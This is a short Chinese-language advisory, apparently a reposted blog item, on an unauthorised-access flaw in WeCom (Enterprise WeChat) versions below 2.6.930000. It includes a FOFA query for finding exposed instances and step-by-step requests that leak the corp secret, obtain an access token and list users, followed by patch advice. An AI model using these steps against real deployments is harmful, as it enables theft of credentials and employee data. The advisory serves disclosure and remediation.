漏洞描述
企业微信是腾讯微信团队为企业打造的专业办公管理工具。2023年8月,互联网上披露其相关接口存在未授权访问漏洞,攻击者可构造恶意请求(/cgi-bin/gateway/agentinfo)获取企业微信secret等敏感信息,并组合调用相关API接口。该漏洞已被黑客武器化,用于大规模蠕虫传播、勒索挖矿,建议您立即关注并修复。
漏洞影响
2.5.x版本、2.6.930000版本以下
复现过程
FOFA网络测绘
根据
app="Tencent-企业微信"
查询所有资产,尝试某一个资产。
获取Secret、strcorpid
访问接口
/cgi-bin/gateway/agentinfo
。
3. 获取token
访问接口/cgi-bin/gettoken?corpid=strcorpid&corpsecret=Secret
。其中 strcorpid、Secret
为步骤2获取的值。
4. 带入token请求功能接口
举例:获取标签成员
访问接口/cgi-bin/user/list?access_token=access_token
。其中access_token
为步骤3获取的值。
- 更多功能可以参考获取成员ID列表 - 接口文档 - 企业微信开发者中心
修复建议
1、升级至最新版本
2、设置其仅对可信地址开放。
转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。